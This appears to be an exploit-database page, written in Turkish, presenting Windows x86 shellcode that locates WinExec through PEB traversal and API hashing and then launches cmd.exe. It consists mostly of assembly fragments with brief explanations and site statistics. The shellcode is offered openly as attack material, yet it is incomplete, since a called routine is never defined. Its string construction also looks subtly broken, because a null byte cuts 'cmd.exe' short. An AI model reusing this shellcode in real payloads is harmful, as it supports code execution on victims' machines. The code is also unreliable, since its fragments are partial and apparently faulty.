Siber Alem / Detail / 242 / Windows-x86-winexec-cmd-exe-shellcode-193-bytes-klasik
vuln_report_viewer.sh
VULN REPORT / shellcode / ID: 242

Windows/x86 WinExec(cmd.exe) Shellcode - 193 Bytes (Klasik)

2026-07-21
18 görüntülenme
Doğrulandı
Windows x86

Özet

Bu kayıt, hedef sistemde bulunan bir zafiyeti detaylandırmaktadır. Zafiyet 2026-07-21 tarihinde yayınlanmış olup, topluluktan 18 görüntülenme almıştır. shellcode kategorisinde sınıflandırılmıştır. Kullanıcıların teknik detaylar için Detay sekmesindeki kaynak kodunu incelemeleri önerilir.

exploit_242.txt

Klasik Shellcode - Windows x86 - 193 Bytes

Windows/x86 WinExec(cmd.exe) - 193 Bytes

Windows shellcode'larinin en temel ornegi. kernel32.dll icindeki WinExec API'sini dinamik olarak bularak cmd.exe baslatir. PEB traversal teknigi, sabit adres kullanmadan dinamik yukleme yapmanin Windows shellcode standart yontemidir.

PEB Traversal ile Kernel32 Bulmak

PEB traversal ASLR'a ragmen calisir, kernel32.dll her zaman ayni InMemoryOrderModuleList konumundadir.

; FS:[0x30] → PEB → Ldr → InMemoryOrderModuleList xor eax, eax mov eax, fs:[eax+0x30] ; EAX = PEB mov eax, [eax+0x0c] ; EAX = PEB Ldr mov eax, [eax+0x14] ; InMemoryOrderModuleList.Flink mov eax, [eax] ; ntdll.dll mov eax, [eax] ; kernel32.dll mov eax, [eax+0x10] ; DllBase = kernel32 taban adresi

API Hash ile WinExec Bulma

; WinExec hash: 0x876F8B31 find_api: push 0x876F8B31 ; WinExec hash call find_function ; esleseni dondur

WinExec Cagrisi

xor eax, eax push eax ; NULL terminator push 0x6578652e ; exe. push 0x646d63 ; cmd mov esi, esp ; ESI = cmd.exe push 1 ; SW_SHOW push esi call [WinExec_addr]

INFO Tarihsel Onem

Bu teknik 2000li yillarda Windows exploitlerinin temelini olusturuyordu. Modern sistemlerde CFG, ASLR ve DEP zorlasdirmistir.

Yazar Profili

Jonathan Salwan
Jonathan Salwan Seçkin Üye
Tüm Gönderilerini Gör

Kayıt İstatistikleri

Görüntülenme 18
İndirmeler 1
Yorumlar 0